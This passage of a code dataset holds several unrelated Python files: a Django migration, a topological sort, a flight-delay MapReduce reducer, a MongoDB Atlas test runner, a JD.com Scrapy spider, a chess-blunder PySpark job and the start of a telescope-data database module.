jsonfield.fields\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='LM',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(unique=True, max_length=20)),\n                ('description', models.CharField(max_length=500)),\n                ('date_added', models.DateTimeField(verbose_name=b'date published')),\n                ('lmdata', jsonfield.fields.JSONField()),\n                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n    ]\n","sub_path":"lm/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"503754411","text":"from graph import read_double_graph\r\n# import time\r\n\r\ndef read_topo_sort_from_file(filename):\r\n    \"\"\"This reads the first line of the file. In a topological sort solution file,\r\n    the first line holds the nodes in topological sort order on the first line,\r\n    separated by whitespace.\"\"\"\r\n    with open(filename) as f:\r\n        string = f.readline()\r\n    return string\r\n\r\n\r\ndef parse_tps(tps_str):\r\n    \"\"\" Gets a string of ordering of nodes for topological\r\n    ordering and creates a list of integers from that. \"\"\"\r\n    return [int(x) for x in tps_str.split()]\r\n\r\n\r\ndef contains_sink_node(graph):\r\n    \"\"\" Returns True when every node has at least one outgoing edge,\r\n    i.e. when the graph contains no sink node. \"\"\"\r\n    # empty collections are boolean false, so this asks if all\r\n    # nodes have a non-empty set of neighbors (outgoing edges)\r\n    return all(graph[i] for i in graph)\r\n\r\n\r\ndef check_TPS(graph, tps):\r\n    \"\"\" Takes an out-edge graph dictionary and a list of integers for\r\n    topological ordering and checks if that topological ordering is correct. \"\"\"\r\n    for i in reversed(range(len(tps))):\r\n        for j in range(i):\r\n            if tps[j] in graph[tps[i]]:\r\n                print(\"Fault: There is a backward edge from \", tps[i], \" to \", tps[j])\r\n                return False\r\n    if len(graph.keys()) != len(tps):\r\n        return False\r\n    return True\r\n\r\n\r\ndef write_tps_to_file(tps, filename):\r\n    with open('output_' + filename, 'w') as file:\r\n        for node in tps:\r\n            file.write(node + ' ')\r\n\r\n\r\ndef compute_tps(filename):\r\n    \"\"\" Write your implementation to create a topological sort here. 
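(The solution below uses the classic three-colour depth-first search: start\r\n    from every source node, recurse into unvisited neighbours, append finished\r\n    nodes, and finally reverse the list.)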
\r\n    Store your answer in tps.\r\n    filename is the name of the input file containing graph information:\r\n    you need to read it in and perform the topological sort, saving the results\r\n    in tps, then use write_tps_to_file() to output it to a file called\r\n    output_filename.\"\"\"\r\n\r\n    tps, colors = [], {}\r\n    out_graph, in_graph = read_double_graph(filename)\r\n    # start_time = time.process_time()\r\n    colors = colors.fromkeys(out_graph, \"w\")\r\n    for v in out_graph:\r\n        if len(in_graph[v]) == 0:\r\n            dfs_visit(v, colors, tps, out_graph)\r\n    tps.reverse()\r\n    # end_time = time.process_time()\r\n    # print(\"Ran in: {:.5f} secs\".format(end_time - start_time))\r\n    # if check_TPS(out_graph, tps):\r\n    #     print(\"CORRECT!\")\r\n    # write_tps_to_file() expects one string per node, so stringify the node\r\n    # labels instead of passing the characters of str(tps)\r\n    write_tps_to_file([str(node) for node in tps], filename)\r\n\r\n\r\ndef dfs_visit(v, colors, tps, out_graph):\r\n    colors[v] = \"g\"\r\n    for e in out_graph[v]:\r\n        if colors[e] == \"w\":\r\n            dfs_visit(e, colors, tps, out_graph)\r\n    colors[v] = \"b\"\r\n    tps.append(v)\r\n\r\n\r\nif __name__ == '__main__':\r\n    \"\"\" Write code here to run compute_tps for your testing purposes\"\"\"\r\n    import sys\r\n    filename = sys.argv[1]\r\n    compute_tps(filename)\r\n","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"2094729","text":"\"\"\"\nPhilippe M. Noël\nMap Reduce - Reducer Subroutine -- Python 3\nBased on: http://www.michael-noll.com/tutorials/writing-an-hadoop-mapreduce-program-in-python/\nOriginal Code from Harvard APMTH120\n\"\"\"\nimport sys\nfrom operator import itemgetter\n\ndef reducer():\n    \"\"\" Reduce Subroutine of the Mapreduce Algorithm for Flight Delays \"\"\"\n    # variables init\n    curr_day, curr_sum_delays, curr_num_days = None, 0, 0\n\n    # STDIN input reading\n    for line in sys.stdin:\n        # remove leading & trailing whitespaces, if any\n        line = line.strip()\n        # parse the input from the Map subroutine of Mapreduce (mapper.py)\n        day, delay = line.split('\\t', 1)\n        delay = int(delay) # type conversion\n        # note: this IF-switch works because Hadoop sorts map output by key\n        if curr_day == day:\n            curr_sum_delays += delay\n            curr_num_days += 1\n        else:\n            # case where day read != curr_day, so we output & reset;\n            # skip the very first record, where there is nothing to output\n            # yet and curr_num_days is still zero\n            if curr_day is not None:\n                # parenthesize the whole format string so % applies to all of\n                # it, not just the last literal\n                print(('Day = %s, Number of Delays = %s, Sum of Delays = %s, '\n                       'Average Delay = %s') % (curr_day, curr_num_days,\n                      curr_sum_delays, float(curr_sum_delays) / float(curr_num_days)))\n            # reset counters\n            curr_sum_delays, curr_num_days, curr_day = delay, 1, day\n\n    # final day output (guard against empty input)\n    if curr_day is not None:\n        print(('Day = %s, Number of Delays = %s, Sum of Delays = %s, '\n               'Average Delay = %s') % (curr_day, curr_num_days,\n              curr_sum_delays, float(curr_sum_delays) / float(curr_num_days)))\n\n\n# driver test\nreducer()\n","sub_path":"mapreduce/airline_reducer.py","file_name":"airline_reducer.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"337136648","text":"# Copyright 2020-present MongoDB, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License 
at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport os\nfrom time import sleep\nfrom urllib.parse import urlencode\n\nfrom tabulate import tabulate\nimport junitparser\nimport yaml\n\nfrom atlasclient import AtlasApiError, JSONObject\nfrom astrolabe.commands import (\n    get_one_organization_by_name, ensure_project, ensure_admin_user,\n    ensure_connect_from_anywhere)\nfrom astrolabe.exceptions import AstrolabeTestCaseError\nfrom astrolabe.poller import BooleanCallablePoller\nfrom astrolabe.utils import (\n    assert_subset, get_cluster_name, get_test_name_from_spec_file,\n    load_test_data, DriverWorkloadSubprocessRunner, SingleTestXUnitLogger,\n    Timer)\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AtlasTestCase:\n    def __init__(self, *, client, test_name, cluster_name, specification,\n                 configuration):\n        # Initialize.\n        self.client = client\n        self.id = test_name\n        self.cluster_name = cluster_name\n        self.spec = specification\n        self.config = configuration\n        self.failed = False\n\n        # Initialize attribute used for memoization of connection string.\n        self.__connection_string = None\n\n        # Initialize wrapper class for running workload executor.\n        self.workload_runner = DriverWorkloadSubprocessRunner()\n\n        # Validate and store organization and project.\n        self.organization = get_one_organization_by_name(\n            client=self.client,\n            organization_name=self.config.organization_name)\n        self.project = ensure_project(\n            client=self.client, project_name=self.config.project_name,\n            organization_id=self.organization.id)\n\n    @property\n    def cluster_url(self):\n        return self.client.groups[self.project.id].clusters[\n            self.cluster_name]\n\n    def get_connection_string(self):\n        if self.__connection_string is None:\n            cluster = self.cluster_url.get().data\n            prefix, suffix = cluster.srvAddress.split(\"//\")\n            uri_options = self.spec.maintenancePlan.uriOptions.copy()\n\n            # Boolean options must be converted to lowercase strings.\n            for key, value in uri_options.items():\n                if isinstance(value, bool):\n                    uri_options[key] = str(value).lower()\n\n            connection_string = (prefix + \"//\" + self.config.database_username\n                                 + \":\" + self.config.database_password + \"@\"\n                                 + suffix + \"/?\")\n            connection_string += urlencode(uri_options)\n            self.__connection_string = connection_string\n        return self.__connection_string\n\n    def __repr__(self):\n        return \"<AtlasTestCase: {}>\".format(self.id)\n\n    def is_cluster_state(self, goal_state):\n        cluster_info = self.cluster_url.get().data\n        return cluster_info.stateName.lower() == goal_state.lower()\n\n    def verify_cluster_configuration_matches(self, state):\n        \"\"\"Verify that the cluster config is what we expect it to be (based on\n        maintenance status). 
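Checks both the cluster configuration and the processArgs resource\n        against the spec. 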
Raises AssertionError.\"\"\"\n state = state.lower()\n if state not in (\"initial\", \"final\"):\n raise AstrolabeTestCaseError(\n \"State must be either 'initial' or 'final'.\")\n cluster_config = self.cluster_url.get().data\n assert_subset(\n cluster_config,\n self.spec.maintenancePlan[state].clusterConfiguration)\n process_args = self.cluster_url.processArgs.get().data\n assert_subset(\n process_args, self.spec.maintenancePlan[state].processArgs)\n\n def initialize(self):\n \"\"\"\n Initialize a cluster with the configuration required by the test\n specification.\n \"\"\"\n LOGGER.info(\"Initializing cluster {!r}\".format(self.cluster_name))\n\n cluster_config = self.spec.maintenancePlan.initial.\\\n clusterConfiguration.copy()\n cluster_config[\"name\"] = self.cluster_name\n try:\n self.client.groups[self.project.id].clusters.post(\n **cluster_config)\n except AtlasApiError as exc:\n if exc.error_code == 'DUPLICATE_CLUSTER_NAME':\n # Cluster already exists. Simply re-configure it.\n # Cannot send cluster name when updating existing cluster.\n cluster_config.pop(\"name\")\n self.client.groups[self.project.id].\\\n clusters[self.cluster_name].patch(**cluster_config)\n\n # Apply processArgs if provided.\n process_args = self.spec.maintenancePlan.initial.processArgs\n if process_args:\n self.client.groups[self.project.id].\\\n clusters[self.cluster_name].processArgs.patch(**process_args)\n\n def run(self, persist_cluster=False, startup_time=1):\n LOGGER.info(\"Running test {!r} on cluster {!r}\".format(\n self.id, self.cluster_name))\n\n # Step-0: sanity-check the cluster configuration.\n self.verify_cluster_configuration_matches(\"initial\")\n\n # Start the test timer.\n timer = Timer()\n timer.start()\n\n # Step-1: load test data.\n test_data = self.spec.driverWorkload.get('testData')\n if test_data:\n LOGGER.info(\"Loading test data on cluster {!r}\".format(\n self.cluster_name))\n connection_string = self.get_connection_string()\n load_test_data(connection_string, self.spec.driverWorkload)\n LOGGER.info(\"Successfully loaded test data on cluster {!r}\".format(\n self.cluster_name))\n\n # Step-2: run driver workload.\n self.workload_runner.spawn(\n workload_executor=self.config.workload_executor,\n connection_string=self.get_connection_string(),\n driver_workload=self.spec.driverWorkload,\n startup_time=startup_time)\n\n # Step-3: begin maintenance routine.\n final_config = self.spec.maintenancePlan.final\n cluster_config = final_config.clusterConfiguration\n process_args = final_config.processArgs\n\n if not cluster_config and not process_args:\n raise RuntimeError(\"invalid maintenance plan\")\n\n if cluster_config:\n LOGGER.info(\"Pushing cluster configuration update\")\n self.cluster_url.patch(**cluster_config)\n\n if process_args:\n LOGGER.info(\"Pushing process arguments update\")\n self.cluster_url.processArgs.patch(**process_args)\n\n # Sleep before polling to give Atlas time to update cluster.stateName.\n sleep(3)\n\n # Step-4: wait until maintenance completes (cluster is IDLE).\n selector = BooleanCallablePoller(\n frequency=self.config.polling_frequency,\n timeout=self.config.polling_timeout)\n LOGGER.info(\"Waiting for cluster maintenance to complete\")\n selector.poll([self], attribute=\"is_cluster_state\", args=(\"IDLE\",),\n kwargs={})\n self.verify_cluster_configuration_matches(\"final\")\n LOGGER.info(\"Cluster maintenance complete\")\n\n # Step-5: interrupt driver workload and capture streams\n stats = self.workload_runner.terminate()\n\n # Stop the timer\n 
timer.stop()\n\n # Step-6: compute xunit entry.\n junit_test = junitparser.TestCase(self.id)\n junit_test.time = timer.elapsed\n\n if (stats['numErrors'] != 0 or stats['numFailures'] != 0 or\n stats['numSuccesses'] == 0):\n LOGGER.info(\"FAILED: {!r}\".format(self.id))\n self.failed = True\n # Write xunit logs for failed tests.\n junit_test.result = junitparser.Failure(str(stats))\n else:\n LOGGER.info(\"SUCCEEDED: {!r}\".format(self.id))\n # Directly log output of successful tests as xunit output\n # is only visible for failed tests.\n\n LOGGER.info(\"Workload Statistics: {}\".format(stats))\n\n # Step 7: download logs asynchronously and delete cluster.\n # TODO: https://github.com/mongodb-labs/drivers-atlas-testing/issues/4\n if not persist_cluster:\n self.cluster_url.delete()\n LOGGER.info(\"Cluster {!r} marked for deletion.\".format(\n self.cluster_name))\n\n return junit_test\n\n\nclass SpecTestRunnerBase:\n \"\"\"Base class for spec test runners.\"\"\"\n def __init__(self, *, client, test_locator_token, configuration, xunit_output,\n persist_clusters, workload_startup_time):\n self.cases = []\n self.client = client\n self.config = configuration\n self.xunit_logger = SingleTestXUnitLogger(output_directory=xunit_output)\n self.persist_clusters = persist_clusters\n self.workload_startup_time = workload_startup_time\n\n for full_path in self.find_spec_tests(test_locator_token):\n # Step-1: load test specification.\n with open(full_path, 'r') as spec_file:\n test_spec = JSONObject.from_dict(\n yaml.load(spec_file, Loader=yaml.FullLoader))\n\n # Step-2: generate test name.\n test_name = get_test_name_from_spec_file(full_path)\n\n # Step-3: generate unique cluster name.\n cluster_name = get_cluster_name(test_name, self.config.name_salt)\n\n self.cases.append(\n AtlasTestCase(client=self.client,\n test_name=test_name,\n cluster_name=cluster_name,\n specification=test_spec,\n configuration=self.config))\n\n # Set up Atlas for tests.\n # Step-1: ensure validity of the organization.\n # Note: organizations can only be created by via the web UI.\n org_name = self.config.organization_name\n LOGGER.info(\"Verifying organization {!r}\".format(org_name))\n org = get_one_organization_by_name(\n client=self.client, organization_name=org_name)\n LOGGER.info(\"Successfully verified organization {!r}\".format(org_name))\n\n # Step-2: check that the project exists or else create it.\n pro_name = self.config.project_name\n LOGGER.info(\"Verifying project {!r}\".format(pro_name))\n project = ensure_project(\n client=self.client, project_name=pro_name, organization_id=org.id)\n LOGGER.info(\"Successfully verified project {!r}\".format(pro_name))\n\n # Step-3: create a user under the project.\n # Note: all test operations will be run as this user.\n uname = self.config.database_username\n LOGGER.info(\"Verifying user {!r}\".format(uname))\n ensure_admin_user(\n client=self.client, project_id=project.id,\n username=uname, password=self.config.database_password)\n LOGGER.info(\"Successfully verified user {!r}\".format(uname))\n\n # Step-4: populate project IP whitelist to allow access from anywhere.\n LOGGER.info(\"Enabling access from anywhere on project \"\n \"{!r}\".format(pro_name))\n ensure_connect_from_anywhere(client=self.client, project_id=project.id)\n LOGGER.info(\"Successfully enabled access from anywhere on project \"\n \"{!r}\".format(pro_name))\n\n # Step-5: log test plan.\n LOGGER.info(self.get_printable_test_plan())\n\n @staticmethod\n def find_spec_tests(test_locator_token):\n raise 
NotImplementedError\n\n    def get_printable_test_plan(self):\n        table_data = []\n        for test_case in self.cases:\n            table_data.append([test_case.id, test_case.cluster_name])\n        table_txt = \"Astrolabe Test Plan\\n{}\\n\"\n        return table_txt.format(tabulate(\n            table_data, headers=[\"Test name\", \"Atlas cluster name\"],\n            tablefmt=\"rst\"))\n\n    def run(self):\n        # Step-0: sentinel flag to track failure/success.\n        failed = False\n\n        # Step-1: initialize tests clusters\n        for case in self.cases:\n            case.initialize()\n\n        # Step-2: run tests round-robin until all have been run.\n        remaining_test_cases = self.cases.copy()\n        while remaining_test_cases:\n            selector = BooleanCallablePoller(\n                frequency=self.config.polling_frequency,\n                timeout=self.config.polling_timeout)\n\n            # Select a case whose cluster is ready.\n            LOGGER.info(\"Waiting for a test cluster to become ready\")\n            active_case = selector.poll(\n                remaining_test_cases, attribute=\"is_cluster_state\",\n                args=(\"IDLE\",), kwargs={})\n            LOGGER.info(\"Test cluster {!r} is ready\".format(\n                active_case.cluster_name))\n\n            # Run the case.\n            xunit_test = active_case.run(persist_cluster=self.persist_clusters,\n                                         startup_time=self.workload_startup_time)\n            # Write xunit entry for case.\n            self.xunit_logger.write_xml(\n                test_case=xunit_test,\n                filename=active_case.id)\n            # Remove completed case from list.\n            remaining_test_cases.remove(active_case)\n            # Update tracker.\n            failed = failed or active_case.failed\n\n        return failed\n\n\nclass SingleTestRunner(SpecTestRunnerBase):\n    \"\"\"Run the spec test file named ``test_locator_token``.\"\"\"\n    @staticmethod\n    def find_spec_tests(test_locator_token):\n        \"\"\"\n        Verify that the given file is a spec test file and return its\n        absolute path.\n        \"\"\"\n        LOGGER.info(\"Loading spec test from file {!r}\".format(\n            test_locator_token))\n        full_path = os.path.realpath(test_locator_token)\n        if (os.path.isfile(full_path) and\n                test_locator_token.lower().endswith(('.yml', '.yaml'))):\n            yield full_path\n\n\nclass MultiTestRunner(SpecTestRunnerBase):\n    \"\"\"Run all spec test files in the ``test_locator_token`` directory.\"\"\"\n    @staticmethod\n    def find_spec_tests(test_locator_token):\n        LOGGER.info(\"Scanning directory {!r} for spec tests\".format(\n            test_locator_token))\n        for root, dirs, files in os.walk(test_locator_token):\n            for file in files:\n                full_path = os.path.join(root, file)\n                if (os.path.isfile(full_path) and\n                        file.lower().endswith(('.yml', '.yaml'))):\n                    LOGGER.debug(\"Loading spec test from file {!r}\".format(\n                        full_path))\n                    yield full_path\n","sub_path":"astrolabe/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"572041036","text":"import scrapy\nfrom jd.items import JdItem\n\nimport json\n\n\nclass JD(scrapy.Spider):\n    name = 'jd'\n    allowed_domains = ['jd.com']\n    start_urls = [\n        'https://search.jd.com/Search?keyword=%E8%BF%9B%E5%8F%A3%E7%89%9B%E5%A5%B6&enc=utf-8&wq=%E8%BF%9B%E5%8F%A3%E7%89%9B%E5%A5%B6&pvid=16abdf7af7b04a2c837a08aaa8705e60'\n    ]\n\n    def parse(self, response):\n        goods = response.xpath('//li[@class=\"gl-item\"]')\n        for good in goods:\n            item1 = JdItem()\n            gid = good.xpath('./@data-sku').extract_first()\n            link = f'https://item.jd.com/{gid}.html'\n            item1['good_ID'] = gid\n            item1['title'] = good.xpath('string(.//div[@class=\"p-name p-name-type-2\"]//em)').extract_first()\n            item1['link'] = link\n            item1['price'] = good.xpath('.//div[@class=\"p-price\"]//i//text()').extract_first()\n            
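# hand the partially-filled item to the detail-page callback via request meta\n            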
yield scrapy.Request(url=link, meta={'item': item1}, callback=self.parse_detail)\n\n def parse_detail(self, response):\n item1 = response.meta['item']\n item1['shop_name'] = response.xpath(\n '//div[@class=\"J-hove-wrap EDropdown fr\"]//div[@class=\"name\"]//a//text()').extract_first()\n gid = item1['good_ID']\n comment_url = f'https://sclub.jd.com/comment/productPageComments.action?productId={gid}&score=0&sortType=5&page=0&pageSize=10'\n yield scrapy.Request(url=comment_url, meta={'item': item1}, callback=self.parse_get_comment)\n\n def parse_get_comment(self, response):\n item1 = response.meta['item']\n data = json.loads(response.text).get('productCommentSummary')\n item1['commentCountStr'] = data['commentCountStr']\n item1['goodCountStr'] = data['goodCountStr']\n item1['generalCountStr'] = data['generalCountStr']\n item1['poorCountStr'] = data['poorCountStr']\n item1['max_page'] = json.loads(response.text).get('maxPage')\n return item1\n","sub_path":"jd/jd/spiders/jd_spider.py","file_name":"jd_spider.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249267477","text":"import sys\nfrom pyspark import SparkContext, AccumulatorParam\nfrom pyspark.sql import SQLContext\nimport io\nimport math\nimport datetime\nimport numpy as np\nimport chess.pgn\nimport random\n\n\ndef round_elo(elo):\n\treturn math.floor(elo / 100.0) * 100\n\n\ndef get_elo_from_str(elo):\n\ttry:\n\t\treturn round_elo(int(elo))\n\texcept Exception:\n\t\treturn -1 # -1 will represent an unknown elo\n\n\ndef get_time_allocated(time_control):\n\tsplit_time_control = time_control.split('+')\n\tif len(split_time_control) > 1:\n\t\treturn int(split_time_control[0])\n\telse:\n\t\treturn -1 # -1 will represent a missing time allocation\n\n\ndef get_one_hot_encoding_of_board(board):\n\tencoding_template = [0 for i in range(12)]\n\n\tposition = []\n\tfor square in chess.SQUARES:\n\t\tpiece = board.piece_at(square)\n\n\t\tencoding = encoding_template.copy()\n\t\tif piece is not None:\n\t\t\tpiece_type = piece.piece_type\n\t\t\t# add six if its a black piece\n\t\t\tif not piece.color:\n\t\t\t\tpiece_type += 6\n\n\t\t\tencoding[piece_type - 1] = 1\n\n\t\tposition.append(encoding)\n\n\treturn position\n\n\n# gets the clock time\ndef get_clock_time_in_seconds(comment):\n\tpass\n\tsp = comment.split('clk')\n\tif len(sp) > 1:\n\t\tt = sp[1].strip().strip(']')\n\t\thours, minutes, seconds = t.split(':')\n\t\treturn datetime.timedelta(hours=int(hours), minutes=int(minutes), seconds=int(seconds)).total_seconds()\n\telse:\n\t\treturn -1 # -1 will represent an unknown clock time\n\n\nWHITE_ELO = 'WhiteElo'\nBLACK_ELO = 'BlackElo'\nTIME_CONTROL = 'TimeControl'\nTERMINATION = 'Termination'\nVARIANT = 'Variant'\nEVAL = 'eval'\n\nMIN_ELO = 1200\nMAX_ELO = 2200\n\nBALANCE = True\n\ndef normalize_elo(elo):\n\treturn ((elo - MIN_ELO) * 1.0) / (MAX_ELO - MIN_ELO)\n\n# range of elos we will include in the dataset\nVALID_ELOS = set(range(MIN_ELO, MAX_ELO + 100, 100))\n\n# lowest time format we will consider\nTIME_FORMAT_CUTOFF = 600\n\n# all moves played with less than this amount of time will not be considered\nCLOCK_CUTOFF = 120\n\n\nif __name__ == '__main__':\n\tinput_dir = sys.argv[1]\n\toutput_dir = sys.argv[2]\n\n\tsc = SparkContext(appName=\"PgnCount\")\n\tsc._jsc.hadoopConfiguration().set(\"textinputformat.record.delimiter\", \"\\n\\n[Event\")\n\n\tsqlContext = SQLContext(sc)\n\n\t# we need to use \\n\\n[Event as our delimiter because of PGN's 
specific format\n\t# then we need to fix the records so that an individual game is a single record\n\t# that a mapper processes\n\tdef fix_record(record):\n\t\tif record.startswith('[Event'):\n\t\t\treturn record + '\\n'\n\t\telse:\n\t\t\treturn ''.join(['[Event', record, '\\n'])\n\n\tdef contains_headers(game):\n\t\treturn (WHITE_ELO in game.headers\n\t\t\tand BLACK_ELO in game.headers\n\t\t\tand TIME_CONTROL in game.headers)\n\n\trecords_analyzed = 0\n\tbatch_size = 10\n\n\t# function used to label all the positions in the game\n\tdef label_game(record):\n\t\tpgn = io.StringIO(record)\n\t\tgame = chess.pgn.read_game(pgn)\n\n\t\tif not contains_headers(game):\n\t\t\treturn []\n\n\t\tif not len(game.variations) > 0:\n\t\t\treturn []\n\n\t\tcomment = game.variations[0].comment\n\n\t\t# game has engine evaluation\n\t\tif not '%eval' in comment:\n\t\t\treturn []\n\n\t\twhite_elo = get_elo_from_str(game.headers[WHITE_ELO])\n\t\tblack_elo = get_elo_from_str(game.headers[BLACK_ELO])\n\n\t\t# if both players are not in the elo range skip the game\n\t\tif not white_elo in VALID_ELOS and not black_elo in VALID_ELOS:\n\t\t\treturn []\n\n\t\ttime_allocated = get_time_allocated(game.headers[TIME_CONTROL])\n\n\t\t# if the time control doesnt meet the cutoff skip the game\n\t\tif time_allocated < TIME_FORMAT_CUTOFF:\n\t\t\treturn []\n\n\t\tblunders = []\n\t\tnon_blunders = []\n\n\t\t# loop through the mainline of the game\n\t\tboard = game.board()\n\n\t\tfor node in game.mainline():\n\t\t\t# get previous positions turn\n\t\t\tturn = board.turn\n\n\t\t\t# get the previous turns elo\n\t\t\telo = white_elo if turn else black_elo\n\n\t\t\tif elo in VALID_ELOS:\n\n\t\t\t\tclock_time = get_clock_time_in_seconds(node.comment)\n\t\t\t\t# was there enough time on the clock?\n\t\t\t\tif clock_time >= CLOCK_CUTOFF:\n\n\t\t\t\t\t# get the position as a one hot encoding\n\t\t\t\t\tposition = get_one_hot_encoding_of_board(board)\n\t\t\t\t\tposition = bytearray(np.array(position).tobytes())\n\t\n\t\t\t\t\tif chess.pgn.NAG_BLUNDER in node.nags:\n\t\t\t\t\t\tblunders.append((position, int(turn), normalize_elo(elo), 1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnon_blunders.append((position, int(turn), normalize_elo(elo), 0))\n\n\t\t\tboard.push(node.move)\n\n\t\tif BALANCE and len(non_blunders) > len(blunders):\n\t\t\tnum_blunders = len(blunders)\n\t\t\tincluded_non_blunders = random.sample(non_blunders, num_blunders)\n\n\t\t\tdataset = blunders + included_non_blunders\n\t\telse:\n\t\t\tdataset = blunders + non_blunders\n\n\t\tglobal records_analyzed\n\t\tglobal batch_size\n\t\trecords_analyzed += 1\n\t\tif records_analyzed % batch_size == 0:\n\t\t\tprint('Number of records processed: {}'.format(records_analyzed))\n\n\t\treturn dataset\n\n\ttext_file = sc.textFile(input_dir)\n\tres = text_file.map(fix_record).flatMap(label_game)\n\n\tdf = sqlContext.createDataFrame(res, ['position', 'turn', 'elo', 'label'])\n\tdf.write.format(\"tfrecords\").option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").mode(\"overwrite\").save(output_dir)\n","sub_path":"spark-jobs/data-preparation-job/data_preparation_job.py","file_name":"data_preparation_job.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272663549","text":"\"\"\"NECSTDB, a database for NECST.\nNECST, an abbreviation of *NEw Control System for Telescope*, is a flexible controlling\nsystem for radio telescopes. 
Its efficient data storage format is provided here.\nThe database contains tables, which keep individual topic of data with some metadata\nattached to them, e.g. spectral data from one spectrometer board (array of data +\ntimestamp), various kinds of weather data (temperature + humidity + wind speed + wind\ndirection + ... + timestamp), etc.\n\"\"\"\n\nimport json\nimport mmap\nimport os\nimport pathlib\nimport re\nimport struct\nimport tarfile\nfrom typing import Any, Dict, List, Tuple, Union\n\nimport numpy\nimport pandas\n\nfrom . import utils\nfrom .recover import recover\n\n\ndef duplicate_rename(path: pathlib.Path, _i: int = 0) -> pathlib.Path:\n    \"\"\"Return nonexistent path for new file.\n\n    Parameters\n    ----------\n    path\n        File path you want to create as *new* file.\n\n    \"\"\"\n    _path = path if _i == 0 else path.parent / f\"{path.stem}({_i}){path.suffix}\"\n    if not _path.exists():\n        return _path\n    return duplicate_rename(path, _i + 1)\n\n\nclass necstdb:\n    \"\"\"Database for NECST.\n\n    Parameters\n    ----------\n    path: PathLike\n        Path to the database directory, the direct parent of *.data and *.header files.\n    mode: str\n        Mode in which the database is opened, either \"r\" or \"w\".\n\n    \"\"\"\n\n    def __init__(self, path: os.PathLike, mode: str) -> None:\n        self.opendb(path, mode)\n\n    def opendb(self, path: os.PathLike, mode: str) -> None:\n        \"\"\"Catch the database directory.\"\"\"\n        self.path = pathlib.Path(path)\n\n        if not self.path.exists():\n            if mode.find(\"w\") != -1:\n                self.path.mkdir(parents=True)\n            elif mode.find(\"r\") != -1:\n                raise Exception(\"This directory doesn't exist!!\")\n\n    def list_tables(self) -> List[str]:\n        \"\"\"List all tables within the database.\"\"\"\n        data = [path.stem for path in self.path.glob(\"*.data\")]\n        header = [path.stem for path in self.path.glob(\"*.header\")]\n        return sorted(set(data) & set(header))\n\n    def create_table(\n        self, name: str, config: Dict[str, Any], endian: str = \"<\"\n    ) -> None:\n        \"\"\"Create a pair of data and header files, then write header content.\"\"\"\n        if name in self.list_tables():\n            return\n        self.endian = endian\n\n        format_list = [dat[\"format\"] for dat in config[\"data\"]]\n\n        # Validate sizes\n        struct_sizes = utils.get_struct_sizes(format_list, endian)\n        for dat, size in zip(config[\"data\"], struct_sizes):\n            dat[\"size\"] = size\n        config[\"struct_indices\"] = True\n\n        data_path = self.path / (name + \".data\")\n        header_path = self.path / (name + \".header\")\n\n        data_path.touch()\n        with header_path.open(\"w\") as f:\n            json.dump(config, f)\n\n    def open_table(self, name: str, mode: str = \"rb\") -> \"table\":\n        \"\"\"Topic-wise data table.\"\"\"\n        if hasattr(self, \"endian\"):\n            return table(self.path, name, mode, self.endian)\n        return table(self.path, name, mode)\n\n    def save_file(self, name: str, data: Union[str, bytes], info: str = \"\") -> None:\n        \"\"\"Save a file in database.\n\n        Parameters\n        ----------\n        name\n            File name.\n        data\n            Contents to be written in the file.\n        info\n            Optional metadata for the file, will be added in first line of the file.\n\n        Examples\n        --------\n        >>> db.save_file(\n        ...     \"example.txt\",\n        ...     \"Some contents here.\",\n        ...     \"Original path: /path/to/example.txt\",\n        ... 
)\n\n \"\"\"\n filepath = duplicate_rename(self.path / name)\n splitter = \"\\n=== Written by NECSTDB ===\\n\"\n if isinstance(data, bytes):\n data = bytes(info + splitter, encoding=\"utf-8\") + data\n _ = filepath.write_bytes(data)\n else:\n data = info + splitter + data\n _ = filepath.write_text(str(data))\n\n def read_file(\n self, name: str, asbytes: bool = False\n ) -> Tuple[Union[str, bytes], Union[str, bytes]]:\n \"\"\"Read a file saved in the database.\n\n Parameters\n ----------\n name\n File name, extension inclusive.\n asbytes\n If True, the data will be returned as bytes.\n\n Examples\n --------\n >>> db.read_file(\"example.txt\")\n \"Some contents here.\", \"Original path: /path/to/example.txt\"\n\n \"\"\"\n if asbytes:\n info, data = (\n (self.path / name)\n .read_bytes()\n .split(b\"\\n=== Written by NECSTDB ===\\n\", 1)\n )\n else:\n info, data = (\n (self.path / name)\n .read_text()\n .split(\"\\n=== Written by NECSTDB ===\\n\", 1)\n )\n return data, info\n\n def checkout(self, saveto: os.PathLike, compression: str = None) -> None:\n \"\"\"Archive the database.\n\n Parameters\n ----------\n saveto: PathLike\n Path to the tar file to be created.\n compression: str\n Compression format/program to be used. One of [\"gz\", \"bz2\", \"xz\"].\n\n \"\"\"\n mode = \"w:\"\n if compression is not None:\n mode += compression\n\n tar = 